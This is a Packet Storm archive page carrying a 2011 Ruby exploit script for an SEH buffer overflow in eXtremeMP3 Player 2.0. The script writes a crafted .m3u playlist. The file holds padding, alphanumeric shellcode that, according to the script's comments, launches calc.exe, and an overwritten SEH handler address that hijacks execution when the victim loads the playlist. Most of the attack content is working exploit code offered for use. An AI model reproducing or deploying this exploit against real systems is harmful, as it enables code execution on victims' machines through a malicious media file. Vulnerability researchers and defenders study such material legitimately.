exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

eXtremeMP3 Player Buffer Overflow

eXtremeMP3 Player Buffer Overflow
Posted Jan 15, 2011
Authored by C4SS!0 G0M3S

eXtremeMP3 Player version 2.0 suffers from a buffer overflow vulnerability.

tags | exploit, overflow
SHA-256 | 92237766a9ed9a04d750ede358c36434a2f75f34b6bb82d27a458afbd0cf6236

eXtremeMP3 Player Buffer Overflow

Change Mirror Download
#
#
#[+]Exploit Title: Exploit Bufer Overflow eXtremeMP3 Player(SEH)
#[+]Date: 01\15\2010
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://ukms.tucows.com/files2/xtremv20RC1.exe
#[+]Version: 2.0
#[+]Tested on: WIN-XP SP3 BRAZILIAN
#[+]CVE: N/A
#
#Create by C4SS!0 G0M3S
#WWW.INVASAO.COM.BR
#Louredo_@hotmail.com
#
# ######### ## ######### ######### ## ###############
# ######## #### ######### ######### ## ## ##
# ## ## ## ## ## ## ## ##
# ## ## ## ## ## ## ## ##
# ## ########## ######## ######## ## ## ##
# ## ## ## ## ## ## ##
# ## ## ## ## ## ## ##
# ######## ## ######## ######### ## ## ##
# ######## ## ######## ######### \/ ###############
#
#Note: To Exploit Works Download Software Open The Playlist Manager Click On Playlist
#Load select The Malicious File And Appears Ready Boom Calc
#
#
#Sorry my English I don't Epeak English
#

system("cls")
system("color 4f")
def Usage()
puts "\n\n\n[+]Exploit: Exploit Buffer Overflow eXtremeMP3 Player"
puts "[+]Date: 01\\14\\2011"
puts "[+]Author: C4SS!0 G0M3S"
puts "[+]Home: www.invasao.com.br"
puts "[+]E-mail: Louredo_@hotmail.com"
puts "[+]Impact: Hich"
puts "[+]Tested On: WIN-XP SP3 PORTUQUESE BRAZILIAN"
puts "[+]Version: 2.0\n"
puts "[+]Software: eXtremeMP3 Player\n\n"
puts "Note: For the Exploit Works File Must be File_Name.m3u\n\n"
end


if ARGV.length !=1:
Usage()
puts "[-]Usage: "+$0+" <File Name> "
puts "[-]Exemple: "+$0+" file.m3u "
exit
end
Usage()
buffer = "\x50\x59\x83\xC1\x42\x51\x58\x50\xC3"
buffer += "\x42" * (59-buffer.length)
puts "[*]Identifying the Length of Shellcode"
sleep(1)
shellcode = "PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJI9KIP01YYOO3LTV2PHLXYR"+
"TQ4KDNQENPXVQT828MSM8KL5SRXSXKDK5VPCHOLU59YBXOFWSKEL384NNCM4BNJWJ7B5LOO52ZM5MPTN"+ #SHELLCODE ALPHA UPPERCASE BASEADDRESS [EAX]
"5E6GYWQZGLVU0L5RQYZ36P5ZUEDYWCLKKEK5URKZPWW9MG8KMGR08UKNBKXXCJWGKSJXOPL0OQ3N3PSN"+ #SHELLCODE WinExec("CALC.EXE",0)
"D0WZW9HGKK3LNK3UOV70SSTPQOQ6SXMJUXFKE9QSNLXZUNJJQ35OXWVLY7MWK9PN9KNV1CQH6DN6OMU4"+
"YLGOG2XVOPYLPSKN7UU3OKXSK8JA"
puts "[*]The Length is Shellcode:#{shellcode.length}"
sleep(1)
buffer += shellcode
buffer += "\x43" * (4097-buffer.length)

nseh = "\xcc\xcc\xcc\xcc"
seh = [0x7CE1B9C6].pack('V')#POPAD / JMP EAX
junk = "ABCDEFGHIJKLMNOPQRSTUVXZ"



payload = buffer+nseh+seh+junk

file = ARGV[0]
head = "http://"+payload

op = "w"
puts "[*]Creating the Archive #{file}"
sleep(1)
begin
f = File.open(file,op)
f.puts head
f.close()
puts "[*]The Archive was Created #{file} Success"
sleep(1)
rescue
puts "ERROR TO CREATE THE FILE"+file
end

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close